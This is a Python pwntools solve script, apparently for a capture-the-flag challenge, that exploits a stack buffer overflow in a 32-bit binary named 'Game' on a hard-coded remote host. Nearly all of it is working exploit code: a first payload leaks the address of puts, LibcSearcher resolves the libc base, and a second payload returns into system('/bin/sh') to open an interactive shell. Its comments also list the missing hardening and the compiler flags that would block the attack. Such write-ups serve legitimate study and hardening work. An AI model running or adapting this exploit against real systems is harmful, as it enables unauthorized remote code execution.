
from pwn import *
from LibcSearcher import *
# Two-stage return-to-libc solve script for the 32-bit "Game" challenge binary:
# stage 1 leaks the runtime address of puts, stage 2 uses that leak to call
# system("/bin/sh").
#
# What the script relies on (useful when hardening the target):
#   * input long enough to reach the saved return address is accepted, and no
#     stack-canary value is placed in the payload, so the target is assumed to
#     be built without a stack protector;
#   * PLT/GOT addresses and 0x80485f4 are used as absolute values, so the
#     target is assumed to be non-PIE;
#   * the puts leak is what defeats libc ASLR.
# Bounding the read into the buffer, -fstack-protector-strong and -fPIE -pie
# each break one of these assumptions.

# Local alternative to the remote connection below (runs ./Game as a child process).
#p = process("./Game")
p = remote("1.95.36.136", 2066)
# Local copy of the binary, parsed only to look up its PLT and GOT entries.
elf = ELF("./Game")
# Answer the two prompts so the program reaches the input that is overflowed.
p.sendlineafter(b"Do you play game?\n",b"yes")
p.sendlineafter(b"Do you think playing games will affect your learning?\n",b"yes")
got = elf.got["puts"]  # GOT slot that holds the resolved address of puts
plt = elf.plt["puts"]  # PLT stub used to call puts
# Hard-coded address inside the binary, used as the return address after puts.
# NOTE(review): presumably the entry of the vulnerable function, so the input
# is read a second time - confirm against the binary.
star = 0x80485f4
# Stage 1: 0x6c+4 filler bytes (presumably a buffer at ebp-0x6c plus the saved
# ebp - TODO confirm), then three 32-bit words: new return address (puts@plt),
# the address puts returns to (star), and the argument to puts (puts@got).
payload = b'a'*(0x6c+4)+p32(plt)+p32(star)+p32(got)
p.sendline(payload)
# Discard two lines of program output that precede the leaked bytes.
p.recvline()
p.recvline()
# First 4 bytes printed by puts(puts@got), unpacked as a 32-bit integer.
puts = u32(p.recv(4))
print("puts=",puts)  # printed in decimal
# Identify the remote libc build from the leaked puts address, then derive the
# libc load base and the addresses of system and the "/bin/sh" string.
libc = LibcSearcher("puts",puts)
base = puts - libc.dump("puts")
sys = base + libc.dump("system")
sh = base + libc.dump("str_bin_sh")
# Stage 2: same filler, then system as the return address, 0 as the address
# system would return to, and the "/bin/sh" pointer as its argument.
payload2 = b'a'*(0x6c+4)+p32(sys)+p32(0)+p32(sh)
p.sendline(payload2)
# Debugging helper, left disabled.
#gdb.attach(p)
# Hand the connection over to the terminal.
p.interactive()
